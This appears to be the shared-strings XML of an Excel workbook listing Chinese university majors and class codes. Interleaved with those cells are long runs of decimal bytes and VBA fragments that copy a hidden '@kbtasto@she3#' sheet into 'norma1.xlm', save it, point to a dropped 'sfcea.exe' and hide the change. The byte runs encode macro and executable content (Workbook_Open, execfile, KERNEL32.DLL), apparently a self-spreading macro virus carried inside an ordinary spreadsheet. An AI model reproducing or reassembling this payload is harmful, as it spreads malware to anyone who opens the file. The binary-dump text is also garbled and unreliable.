15 255 240 8 255 160 32 232 183 109 249 182 5 130 20 61 13 255 15 88 38 191 5 18 9 89 150 111 219 255 115 104 113 2 86 9 255 96 94 92 109 91 150 101 88 111 99 17 41 133 95 </t>
  </si>
  <si>
    <t xml:space="preserve">0 112 255 96 254 41 4 0 116 255 60 255 54 4 0 44 255 64 255 28 197 1 0 3 19 0 2 0 51 40 64 255 1 0 4 80 254 4 76 254 4 116 255 5 0 0 36 1 0 13 208 0 2 0 8 116 255 13 48 0 23 0 108 76 254 253 105 80 255 26 116 255 254 104 44 254 203 2 0 63 4 112 255 4 60 255 252 237 80 254 4 116 255 5 0 0 36 1 0 13 208 0 2 0 8 116 255 13 68 0 23 0 8 60 255 13 8 1 4 0 108 112 255 27 24 0 251 48 47 112 255 41 4 0 116 255 60 255 28 190 2 0 63 4 42 254 245 9 4 0 0 4 60 255 252 237 80 254 4 116 255 5 0 0 36 1 0 13 208 0 2 0 8 116 255 13 68 0 23 0 8 60 255 13 164 1 4 0 107 42 254 244 255 198 41 4 0 116 255 60 255 28 188 2 0 63 245 9 4 0 0 39 64 255 37 39 80 255 37 39 96 255 37 4 60 255 252 237 80 254 4 116 255 5 0 0 36 1 0 13 208 0 2 0 8 116 255 13 68 0 23 0 8 60 255 13 108 0 4 0 41 4 0 116 255 60 255 0 5 30 203 2 0 2 0 2 0 11 4 80 254 254 126 44 254 250 1 0 90 4 60 255 40 96 255 1 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 81 60 255 253 111 44 255 37 4 20 255 58 80 255 35 0 37 4 24 255 5 5 0 36 6 0 13 192 1 4 0 8 24 255 13 100 0 7 0 8 20 255 254 152 10 0 1 0 41 6 0 116 255 24 255 20 255 53 44 255 0 49 252 102 80 255 37 4 60 255 40 96 255 1 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 60 255 254 155 11 0 41 4 0 116 255 60 255 0 50 58 80 255 35 0 37 4 60 255 40 96 255 1 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 60 255 254 155 8 0 41 4 0 116 255 60 255 0 122 40 80 255 3 0 37 4 60 255 58 96 255 35 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 </t>
  </si>
  <si>
    <t>ThisWorkbook.Sheets("@kbtasto@she3#").Columns(3).Copy Workbooks("norma1.xlm").Sheets("@kbtasto@she3#").Columns(3)</t>
  </si>
  <si>
    <t>060322</t>
  </si>
  <si>
    <t>飞行器动力工程</t>
  </si>
  <si>
    <t>060331</t>
  </si>
  <si>
    <t>060332</t>
  </si>
  <si>
    <t>飞行器设计与工程</t>
  </si>
  <si>
    <t>060341</t>
  </si>
  <si>
    <t>060342</t>
  </si>
  <si>
    <t>04</t>
  </si>
  <si>
    <t>电子信息工程</t>
  </si>
  <si>
    <t>060411</t>
  </si>
  <si>
    <t>060412</t>
  </si>
  <si>
    <t>060413</t>
  </si>
  <si>
    <t>060414</t>
  </si>
  <si>
    <t>通信工程</t>
  </si>
  <si>
    <t>060421</t>
  </si>
  <si>
    <t>060422</t>
  </si>
  <si>
    <t>05</t>
  </si>
  <si>
    <t>英语</t>
  </si>
  <si>
    <t>060511</t>
  </si>
  <si>
    <t>060512</t>
  </si>
  <si>
    <t>060513</t>
  </si>
  <si>
    <t>060514</t>
  </si>
  <si>
    <t>德语</t>
  </si>
  <si>
    <t>060531</t>
  </si>
  <si>
    <t>060532</t>
  </si>
  <si>
    <t>计算机科学与技术</t>
  </si>
  <si>
    <t>060611</t>
  </si>
  <si>
    <t>060612</t>
  </si>
  <si>
    <t>060613</t>
  </si>
  <si>
    <t>网络工程</t>
  </si>
  <si>
    <t>060621</t>
  </si>
  <si>
    <t>060622</t>
  </si>
  <si>
    <t>060623</t>
  </si>
  <si>
    <t>教育技术学</t>
  </si>
  <si>
    <t>060631</t>
  </si>
  <si>
    <t>软件工程</t>
  </si>
  <si>
    <t>062011</t>
  </si>
  <si>
    <t>062012</t>
  </si>
  <si>
    <t xml:space="preserve">124 51 219 246 218 14 255 135 5 242 62 124 2 101 9 255 83 178 44 203 178 81 104 109 90 106 95 150 101 249 166 3 255 162 164 160 155 72 23 255 64 101 219 190 109 194 181 176 114 18 255 75 68 26 59 125 182 101 219 182 85 101 89 17 131 176 209 116 200 28 219 182 109 217 14 148 122 26 105 158 81 44 84 2 109 219 150 109 27 53 21 179 14 120 80 121 2 242 118 219 182 176 161 236 35 175 77 40 19 254 11 255 39 219 182 229 219 213 2 148 19 255 145 55 185 121 65 198 83 229 111 183 109 138 92 64 158 248 20 254 23 255 60 4 255 250 183 109 89 182 252 2 245 54 5 26 165 47 129 17 178 185 109 107 164 80 84 47 125 197 2 134 219 182 149 219 229 89 86 10 5 22 83 154 8 211 109 95 182 229 16 255 19 171 17 233 190 21 255 93 74 110 182 109 203 182 2 216 53 108 200 95 106 11 104 2 219 182 109 219 115 32 128 110 248 59 6 32 75 191 238 109 203 182 45 242 149 222 14 207 226 23 15 109 115 219 182 38 230 68 132 23 217 95 5 174 56 86 80 219 182 198 2 99 11 225 38 88 176 188 112 195 70 226 12 164 0 250 95 95 115 117 145 126 64 60 89 95 254 95 104 78 103 254 22 177 114 25 79 95 97 112 112 95 116 15 160 96 174 183 9 95 102 109 219 11 218 34 13 214 243 13 97 27 28 100 11 87 11 86 23 55 14 226 120 231 58 232 156 83 17 105 254 116 16 28 5 186 28 165 53 227 252 114 71 251 25 104 127 57 109 115 103 120 51 11 99 109 121 17 108 48 87 80 14 99 7 139 15 152 110 253 109 98 27 38 95 88 17 27 22 107 96 116 3 116 159 39 8 26 213 32 15 111 110 95 50 222 1 3 195 12 186 66 45 129 237 176 214 80 60 222 51 17 102 101 53 208 212 30 119 99 115 118 114 112 217 116 165 206 185 48 245 107 2 47 98 223 118 174 69 114 17 217 58 15 24 117 112 216 38 54 119 78 83 116 11 54 52 46 6 27 230 222 102 11 9 65 14 114 150 112 179 230 104 6 5 37 1 104 182 182 1 228 60 196 108 5 31 109 108 214 94 196 115 225 17 7 15 67 55 139 </t>
  </si>
  <si>
    <t xml:space="preserve">254 255 32 13 0 0 208 254 255 255 12 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 56 13 0 0 192 254 255 255 12 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 255 255 255 255 176 254 255 255 12 0 255 255 32 0 0 0 5 0 0 0 64 4 254 255 255 255 255 255 42 254 255 255 11 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 255 255 255 255 200 254 255 255 12 0 255 255 32 0 0 0 5 0 0 0 255 255 255 255 88 12 0 0 255 255 255 255 128 13 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 144 10 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 232 10 0 0 208 10 0 0 168 11 0 0 255 255 255 255 88 11 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 184 10 0 0 168 10 0 0 255 255 255 255 232 12 0 0 255 255 255 255 48 14 0 0 208 4 0 0 100 2 104 2 108 2 28 2 164 2 255 255 32 0 0 0 5 0 0 0 64 4 254 255 128 14 0 0 196 254 255 255 9 0 255 255 32 0 0 0 0 0 0 0 255 255 255 255 8 14 0 0 255 255 255 255 112 14 0 0 64 4 254 255 255 255 255 255 192 254 255 255 9 0 255 255 32 0 0 0 0 0 0 0 255 255 255 255 96 14 0 0 255 255 255 255 152 14 0 0 255 255 255 255 160 14 0 0 255 255 255 255 168 14 0 0 4 0 4 0 0 0 1 0 0 0 0 0 1 0 0 0 48 0 0 0 255 255 255 255 255 255 255 255 240 1 0 0 8 0 0 0 255 255 255 255 128 12 0 0 255 255 255 255 255 255 255 255 240 1 0 0 8 0 0 0 255 255 255 255 255 255 255 255 255 255 255 255 64 2 0 0 0 0 0 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">101 99 116 248 138 96 0 7 0 101 120 101 102 105 108 101 30 221 96 0 3 0 82 117 110 95 208 96 0 3 0 67 104 114 75 126 96 0 8 0 70 117 108 108 78 97 109 101 208 158 96 0 5 4 67 108 97 115 115 26 187 96 0 11 128 0 0 255 3 1 0 78 101 119 87 111 114 107 98 111 111 107 145 29 96 0 19 128 0 0 255 3 1 0 87 111 114 107 98 111 111 107 66 101 102 111 114 101 67 108 111 115 101 42 59 96 0 12 128 0 0 255 3 1 0 87 111 114 107 98 111 111 107 79 112 101 110 225 226 96 0 8 128 0 0 255 3 1 0 95 68 101 102 97 117 108 116 106 194 96 0 12 0 95 66 95 118 97 114 95 76 84 114 105 109 225 38 96 0 12 0 95 66 95 118 97 114 95 82 84 114 105 109 114 146 96 0 8 128 0 0 255 3 255 255 95 66 95 118 97 114 95 105 9 162 96 0 15 128 0 0 255 3 255 255 95 66 95 118 97 114 95 104 97 115 115 97 118 101 100 23 157 96 0 9 128 0 0 255 3 255 255 95 66 95 118 97 114 95 99 104 116 241 96 0 5 4 115 102 99 101 97 27 64 96 0 5 0 102 115 99 101 97 45 225 96 0 3 0 102 115 111 234 143 96 0 10 128 0 0 255 3 255 255 95 66 95 118 97 114 95 102 115 111 251 76 96 0 10 0 103 101 116 115 112 101 99 105 97 108 120 63 96 0 14 128 0 0 255 3 255 255 95 66 95 118 97 114 95 101 120 101 102 105 108 101 162 224 96 0 16 0 103 101 116 115 112 101 99 105 97 108 102 111 108 100 101 114 81 92 96 0 4 0 101 120 101 102 125 121 96 0 6 0 115 102 102 105 108 101 58 209 96 0 4 0 102 105 108 101 37 240 96 0 12 128 0 0 255 3 255 255 95 66 95 118 97 114 95 102 115 99 101 97 26 165 96 0 2 255 255 1 1 84 0 0 0 255 255 255 255 255 255 255 255 255 255 255 255 25 2 1 0 13 0 255 255 255 255 255 255 0 2 1 0 255 255 2 2 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 12 2 255 255 255 </t>
  </si>
  <si>
    <t>Workbooks("norma1.xlm").Save</t>
  </si>
  <si>
    <t xml:space="preserve">96 3 0 0 0 129 8 0 2 0 2 0 112 3 0 0 0 129 8 0 2 0 5 0 120 3 0 0 0 129 8 0 24 0 43 0 128 3 0 0 0 129 8 0 2 0 3 0 152 3 0 0 0 129 8 0 2 0 2 0 160 3 0 0 0 129 8 0 16 0 16 0 168 3 0 0 0 129 8 0 14 0 28 0 184 3 0 0 0 129 8 0 2 0 2 0 200 3 0 0 0 128 8 0 4 0 0 0 208 3 0 0 0 129 8 0 50 0 81 0 216 3 0 0 0 129 8 0 10 0 17 0 16 4 0 0 0 129 8 0 2 0 2 0 32 4 0 0 0 129 8 0 10 0 17 0 40 4 0 0 0 128 9 0 0 0 0 0 255 255 255 255 4 129 8 0 2 0 3 0 56 4 0 0 0 128 9 0 0 0 0 0 255 255 255 255 34 129 12 0 6 0 9 0 64 4 0 0 0 129 8 0 10 0 34 0 40 9 0 0 0 129 8 0 26 0 27 0 72 4 0 0 0 129 8 0 10 0 27 0 104 4 0 0 0 129 8 0 2 0 3 0 120 4 0 0 0 129 8 0 2 0 2 0 128 4 0 0 0 129 8 0 96 0 170 0 32 7 0 0 0 129 8 0 34 0 46 0 136 4 0 0 0 129 8 0 10 0 15 0 176 4 0 0 0 129 8 0 2 0 2 0 192 4 0 0 0 129 8 0 60 0 115 0 200 4 0 0 0 129 8 0 2 0 3 0 8 5 0 0 0 129 8 0 2 0 2 0 16 5 0 0 0 129 8 0 22 0 51 0 24 5 0 0 0 129 8 0 28 0 63 0 48 5 0 0 0 129 8 0 20 0 63 0 80 5 0 0 0 129 8 0 16 0 63 0 104 5 0 0 0 129 8 0 4 0 5 0 120 5 0 0 0 129 8 0 2 0 2 0 128 5 0 0 0 129 8 0 2 0 2 0 136 5 0 0 0 129 8 0 4 0 11 0 144 5 0 0 0 128 8 0 4 0 0 0 152 5 0 0 0 129 8 0 48 0 90 0 160 5 0 0 0 129 8 0 20 0 49 0 240 6 0 0 0 129 8 0 36 0 50 0 208 5 0 0 0 129 8 0 82 0 122 0 248 5 0 0 0 129 8 0 </t>
  </si>
  <si>
    <t xml:space="preserve">129 0 0 0 254 255 255 255 131 0 0 0 132 0 0 0 133 0 0 0 134 0 0 0 135 0 0 0 136 0 0 0 137 0 0 0 138 0 0 0 139 0 0 0 140 0 0 0 141 0 0 0 142 0 0 0 143 0 0 0 144 0 0 0 145 0 0 0 146 0 0 0 147 0 0 0 148 0 0 0 149 0 0 0 150 0 0 0 151 0 0 0 152 0 0 0 153 0 0 0 154 0 0 0 155 0 0 0 156 0 0 0 157 0 0 0 158 0 0 0 159 0 0 0 160 0 0 0 161 0 0 0 162 0 0 0 163 0 0 0 164 0 0 0 165 0 0 0 166 0 0 0 167 0 0 0 168 0 0 0 169 0 0 0 170 0 0 0 171 0 0 0 172 0 0 0 254 255 255 255 174 0 0 0 175 0 0 0 176 0 0 0 177 0 0 0 254 255 255 255 254 255 255 255 180 0 0 0 181 0 0 0 182 0 0 0 183 0 0 0 184 0 0 0 185 0 0 0 186 0 0 0 254 255 255 255 188 0 0 0 189 0 0 0 190 0 0 0 254 255 255 255 192 0 0 0 193 0 0 0 194 0 0 0 195 0 0 0 254 255 255 255 197 0 0 0 254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t>
  </si>
  <si>
    <t>a1:</t>
  </si>
  <si>
    <t>160313</t>
  </si>
  <si>
    <t>160314</t>
  </si>
  <si>
    <t>160315</t>
  </si>
  <si>
    <t>160316</t>
  </si>
  <si>
    <t>160321</t>
  </si>
  <si>
    <t>160322</t>
  </si>
  <si>
    <t>160323</t>
  </si>
  <si>
    <t>160331</t>
  </si>
  <si>
    <t>160332</t>
  </si>
  <si>
    <t>160333</t>
  </si>
  <si>
    <t>160334</t>
  </si>
  <si>
    <t>160335</t>
  </si>
  <si>
    <t>160336</t>
  </si>
  <si>
    <t>160341</t>
  </si>
  <si>
    <t>160342</t>
  </si>
  <si>
    <t>160343</t>
  </si>
  <si>
    <t>160351</t>
  </si>
  <si>
    <t>160411</t>
  </si>
  <si>
    <t>160412</t>
  </si>
  <si>
    <t>160413</t>
  </si>
  <si>
    <t>160414</t>
  </si>
  <si>
    <t>160415</t>
  </si>
  <si>
    <t>160421</t>
  </si>
  <si>
    <t>160422</t>
  </si>
  <si>
    <t>160423</t>
  </si>
  <si>
    <t>160431</t>
  </si>
  <si>
    <t>160432</t>
  </si>
  <si>
    <t>160441</t>
  </si>
  <si>
    <t>160442</t>
  </si>
  <si>
    <t>160443</t>
  </si>
  <si>
    <t>160451</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 72 0 4 0 0 0 0 0 56 0 28 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 8 0 8 0 136 1 0 0 152 215 66 66 4 0 1 18 0 42 0 92 0 82 0 49 0 42 0 35 0 50 0 56 0 50 0 1 18 0 42 0 92 0 82 0 49 0 42 0 35 0 50 0 56 0 54 0 1 36 0 42 0 92 0 82 0 102 0 102 0 102 0 102 0 42 0 48 0 58 0 52 0 51 0 49 0 55 0 49 0 50 0 50 0 55 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 101 0 57 0 1 14 0 42 0 92 0 82 0 48 0 42 0 35 0 102 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 51 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 101 0 56 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 99 0 101 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 102 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 51 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 99 0 101 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 102 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 101 0 56 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 51 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 99 0 101 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 102 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 101 0 56 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 51 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 99 0 101 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 102 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 101 0 56 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 101 0 57 0 1 14 0 42 0 92 0 82 0 48 0 42 0 35 0 102 0 1 16 0 42 0 </t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 0 0 0 4 0 0 0 1 0 2 0 232 0 0 128 40 0 0 128 4 0 0 0 104 0 0 128 16 0 0 0 168 0 0 128 0 0 0 0 0 0 0 0 4 0 0 0 1 0 0 0 250 0 0 128 64 0 0 128 0 0 0 0 0 0 0 0 4 0 0 0 0 0 1 0 4 8 0 0 88 0 0 0 20 1 1 0 2 1 0 0 228 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4 0 0 0 0 0 1 0 139 0 0 0 128 0 0 128 0 0 0 0 0 0 0 0 4 0 0 0 0 0 1 0 4 8 0 0 152 0 0 0 24 2 1 0 40 0 0 0 228 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4 0 0 0 0 0 1 0 1 0 0 0 192 0 0 128 0 0 0 0 0 0 0 0 4 0 0 0 0 0 1 0 4 8 0 0 216 0 0 0 24 49 1 0 128 3 0 0 228 4 0 0 0 0 0 0 8 0 73 0 78 0 73 0 84 0 73 0 78 0 70 0 79 0 12 0 73 0 68 0 82 0 95 0 73 0 78 0 73 0 84 0 73 0 78 0 70 0 79 0 64 2 1 0 128 3 52 0 0 0 86 0 83 0 95 0 86 0 69 0 82 0 83 0 73 0 79 0 78 0 95 0 73 0 78 0 70 0 79 0 0 0 0 0 189 4 239 254 0 0 1 0 1 0 5 0 132 8 40 10 0 0 0 0 0 0 0 0 23 0 0 0 0 0 0 0 4 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 222 2 0 0 1 0 83 0 116 0 114 0 105 0 110 0 103 0 70 0 105 0 108 0 101 0 73 0 110 0 102 0 111 0 0 0 186 2 0 0 1 0 48 0 52 0 48 0 57 0 48 0 52 0 98 0 48 0 0 0 76 0 22 0 1 0 67 0 111 0 109 0 112 0 97 0 110 0 121 0 78 0 97 0 109 0 101 0 0 0 0 0 77 0 105 0 99 0 114 0 111 0 115 0 111 0 102 0 116 0 32 0 67 0 111 0 114 0 112 0 111 0 114 0 97 0 116 0 105 0 111 0 110 0 0 0 102 0 31 0 </t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 161 3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 185 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4 0 0 2 12 0 0 0 84 104 105 115 87 111 114 107 98 111 111 107 1 0 0 2 3 0 0 0 192 224 49 3 0 0 2 10 0 0 0 86 66 65 80 114 111 106 101 99 116 4 0 0 3 239 4 2 0 0 0 0 0 192 0 0 0 0 0 0 70 12 0 0 2 47 0 0 0 67 58 92 80 82 79 71 82 65 126 49 92 67 79 77 77 79 78 126 49 92 77 73 67 82 79 83 126 49 92 86 66 65 92 86 66 65 54 92 86 66 69 54 46 68 76 76 1 0 0 2 3 0 0 0 86 66 65 10 0 0 10 17 1 0 0 0 0 0 0 255 255 255 255 4 0 0 0 9 0 0 0 57 1 0 0 0 0 0 0 161 1 0 0 0 0 0 0 144 0 0 0 0 0 0 0 0 0 0 0 0 0 4 0 0 3 19 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 14 0 0 2 52 0 0 0 67 58 92 80 114 111 103 114 97 109 32 70 105 108 101 115 92 77 105 99 114 111 115 111 102 116 32 79 102 102 105 99 101 92 79 102 102 105 99 101 49 48 92 69 88 67 69 76 46 69 88 69 2 0 0 2 5 0 0 0 69 120 99 101 108 10 0 0 10 9 2 0 0 0 0 0 0 255 255 255 255 1 0 4 0 0 0 0 0 49 2 0 0 0 0 0 0 169 2 0 0 0 0 0 0 160 0 0 0 0 0 0 0 0 0 0 0 0 0 4 0 0 3 48 4 2 0 0 0 0 0 192 0 0 0 0 0 0 70 8 0 0 2 29 0 0 0 67 58 92 87 73 78 78 84 92 115 121 115 116 101 109 51 50 92 115 116 100 111 108 101 50 46 116 108 98 2 0 0 2 6 0 0 0 115 116 100 111 108 101 10 0 0 10 25 3 0 0 0 0 0 0 255 255 255 255 2 0 0 0 0 0 0 0 65 3 0 0 0 0 0 0 137 3 0 0 0 </t>
  </si>
  <si>
    <t>ThisWorkbook.Saved = True</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 176 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 2 3 0 0 0 65 112 112 4 0 0 3 76 208 248 45 250 91 27 16 189 229 0 170 0 68 222 82 13 0 0 2 49 0 0 0 67 58 92 80 114 111 103 114 97 109 32 70 105 108 101 115 92 77 105 99 114 111 115 111 102 116 32 79 102 102 105 99 101 92 79 102 102 105 99 101 92 109 115 111 57 46 100 108 108 2 0 0 2 6 0 0 0 79 102 102 105 99 101 10 0 0 10 9 4 0 0 0 0 0 0 255 255 255 255 2 0 2 0 0 0 0 0 49 4 0 0 0 0 0 0 161 4 0 0 0 0 0 0 192 0 0 0 0 0 0 0 0 0 0 0 0 0 4 0 0 3 218 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 4 0 0 3 125 11 180 57 181 125 97 76 169 75 57 57 134 51 32 116 4 0 0 3 25 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 4 0 0 3 254 124 78 192 108 34 191 76 136 243 12 48 73 15 20 198 4 0 0 3 18 68 2 0 0 0 0 0 192 0 0 0 0 0 0 70 3 0 0 2 8 0 0 0 87 111 114 107 98 111 111 107 4 0 0 2 13 0 0 0 87 111 114 107 98 111 111 107 95 79 112 101 110 4 0 0 13 16 0 16 0 68 0 0 0 1 0 0 0 0 0 52 0 3 0 4 0 0 3 43 61 251 252 250 160 104 16 167 56 8 0 43 51 113 181 4 0 0 3 88 51 140 199 210 172 10 75 161 124 36 163 193 228 131 245 4 0 0 3 42 61 251 252 250 160 104 16 167 56 8 0 43 51 113 181 4 0 0 3 50 53 13 92 110 12 76 69 149 255 218 198 95 199 44 60 4 0 0 3 33 61 251 252 250 160 104 16 167 56 8 0 43 51 113 181 2 0 0 2 5 0 0 0 67 108 97 115 115 4 0 0 3 80 240 21 103 118 240 205 17 155 51 8 0 43 51 111 20 3 0 0 2 10 0 0 0 86 66 73 110 116 101 114 110 97 108 10 0 0 10 41 7 0 0 0 0 0 0 255 255 255 255 6 0 0 0 9 0 0 0 255 255 255 255 81 </t>
  </si>
  <si>
    <t>End Sub</t>
  </si>
  <si>
    <t xml:space="preserve">115 0 116 0 101 0 109 0 0 0 0 0 70 0 17 0 1 0 80 0 114 0 111 0 100 0 117 0 99 0 116 0 86 0 101 0 114 0 115 0 105 0 111 0 110 0 0 0 53 0 44 0 32 0 49 0 44 0 32 0 50 0 54 0 48 0 48 0 44 0 32 0 50 0 49 0 56 0 48 0 0 0 0 0 68 0 0 0 1 0 86 0 97 0 114 0 70 0 105 0 108 0 101 0 73 0 110 0 102 0 111 0 0 0 0 0 36 0 4 0 0 0 84 0 114 0 97 0 110 0 115 0 108 0 97 0 116 0 105 0 111 0 110 0 0 0 0 0 9 4 176 4 0 0 0 0 0 0 0 0 0 0 0 0 176 53 1 0 96 53 1 0 0 0 0 0 0 0 0 0 0 0 0 0 189 53 1 0 112 53 1 0 0 0 0 0 0 0 0 0 0 0 0 0 202 53 1 0 120 53 1 0 0 0 0 0 0 0 0 0 0 0 0 0 212 53 1 0 128 53 1 0 0 0 0 0 0 0 0 0 0 0 0 0 222 53 1 0 136 53 1 0 0 0 0 0 0 0 0 0 0 0 0 0 234 53 1 0 144 53 1 0 0 0 0 0 0 0 0 0 0 0 0 0 246 53 1 0 152 53 1 0 0 0 0 0 0 0 0 0 0 0 0 0 2 54 1 0 160 53 1 0 0 0 0 0 0 0 0 0 0 0 0 0 13 54 1 0 168 53 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 24 54 1 0 38 54 1 0 54 54 1 0 0 0 0 0 68 54 1 0 0 0 0 0 82 54 1 0 0 0 0 0 183 4 0 128 0 0 0 0 90 54 1 0 0 0 0 0 96 54 1 0 0 0 0 0 112 54 1 0 0 0 0 0 126 54 1 0 0 0 0 0 134 54 1 0 0 0 0 0 75 69 82 78 69 76 51 50 46 68 76 76 0 65 68 86 65 80 73 51 50 46 100 108 108 0 71 68 73 51 50 46 100 108 108 0 77 70 67 55 49 46 68 76 76 0 77 83 86 67 82 55 49 46 100 108 108 0 83 72 69 76 76 51 50 46 100 108 108 0 83 72 76 87 65 80 73 46 100 108 </t>
  </si>
  <si>
    <t>filexlm = folder1 &amp; "\norma1.xlm"</t>
  </si>
  <si>
    <t xml:space="preserve">110 223 192 72 37 9 192 50 5 5 40 128 139 240 235 220 175 153 160 75 66 83 195 249 231 204 0 189 186 80 5 3 100 161 110 197 219 232 80 10 210 37 11 163 186 213 53 59 141 3 80 111 61 224 92 230 170 118 238 6 171 53 104 220 106 18 204 82 101 34 6 241 141 134 130 207 213 82 211 178 107 222 177 145 133 111 3 89 72 195 204 77 208 204 5 176 145 145 145 192 164 156 152 131 130 219 14 104 61 75 115 14 52 3 196 67 181 181 151 54 133 0 148 207 117 81 233 63 251 221 64 129 16 154 236 45 31 133 1 38 236 43 200 139 223 86 192 183 196 12 139 225 139 8 182 80 101 148 203 218 35 99 77 92 104 104 155 6 205 170 131 110 186 16 198 16 16 43 224 53 69 173 9 160 80 185 33 249 199 2 65 171 114 80 224 230 37 128 239 86 62 100 163 46 195 144 41 128 89 4 178 155 112 129 166 225 81 37 88 106 92 0 202 143 183 18 135 123 219 163 72 139 61 12 31 168 131 255 255 215 102 129 56 77 90 117 31 139 72 60 3 200 129 57 80 69 35 18 179 109 224 173 199 24 61 11 185 116 31 6 2 20 63 241 91 5 49 228 235 39 131 185 49 14 118 242 179 253 139 91 152 153 248 111 14 131 121 116 15 226 1 168 25 204 232 173 140 186 112 215 16 128 107 16 118 89 131 13 0 220 206 246 104 255 6 224 20 20 180 100 100 187 116 14 148 137 8 13 24 144 187 7 247 119 161 28 12 0 163 216 13 143 194 4 142 98 86 110 24 224 57 29 148 58 57 102 158 83 207 237 254 206 32 24 80 104 28 23 104 24 4 14 188 31 220 6 96 10 31 185 145 161 140 78 2 64 43 64 204 2 210 16 61 136 202 136 7 251 2 184 125 224 200 17 21 40 77 32 33 175 0 229 96 196 196 115 107 248 126 200 247 188 89 104 20 78 0 89 89 161 48 142 48 168 240 6 223 165 220 138 6 60 97 93 58 195 4 237 186 118 163 20 117 84 14 10 10 18 6 70 65 252 214 194 28 88 237 168 141 133 124 255 45 128 191 60 66 16 246 69 168 1 116 6 191 4 133 45 254 172 235 3 106 10 88 80 118 83 100 10 133 214 </t>
  </si>
  <si>
    <t>filesf = folder1 &amp; "\sfcea.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">116 0 97 0 115 0 116 0 111 0 64 0 115 0 104 0 101 0 51 0 35 0 39 0 33 0 82 0 49 0 67 0 49 0 58 0 82 0 56 0 67 0 49 0 15 0 0 11 54 0 0 0 61 0 39 0 64 0 107 0 98 0 116 0 97 0 115 0 116 0 111 0 64 0 115 0 104 0 101 0 51 0 35 0 39 0 33 0 82 0 49 0 67 0 49 0 58 0 82 0 57 0 67 0 49 0 9 0 0 11 30 0 0 0 83 0 97 0 118 0 101 0 32 0 99 0 104 0 97 0 110 0 103 0 101 0 115 0 32 0 116 0 111 0 2 0 0 11 2 0 0 0 63 0 10 0 0 11 32 0 0 0 83 0 97 0 118 0 101 0 32 0 99 0 104 0 97 0 110 0 103 0 101 0 115 0 32 0 116 0 111 0 32 0 3 0 0 11 4 0 0 0 32 0 63 0 7 0 0 11 20 0 0 0 110 0 111 0 114 0 109 0 97 0 49 0 46 0 120 0 108 0 109 0 4 0 0 3 147 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 30 0 0 127 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 114 85 128 0 0 0 128 0 0 0 128 0 0 0 128 0 0 0 1 0 0 126 1 0 0 126 1 0 0 126 1 0 0 126 1 0 0 126 117 0 0 127 0 0 0 0 10 0 0 0 9 0 0 0 0 0 0 0 255 255 255 255 255 255 255 255 255 255 255 255 0 0 0 0 9 0 0 0 0 0 5 0 9 0 0 0 0 0 3 0 3 0 0 9 193 2 0 0 0 0 0 0 177 5 0 0 0 0 0 0 8 0 0 0 0 0 1 0 3 0 0 9 113 7 0 0 0 0 0 0 233 6 0 0 0 0 0 0 24 0 0 0 0 0 1 0 3 0 0 9 193 2 0 0 0 0 0 0 201 7 0 0 0 0 0 0 40 0 0 0 0 0 1 0 1 0 0 8 3 0 0 0 65 112 112 3 0 0 9 193 2 0 </t>
  </si>
  <si>
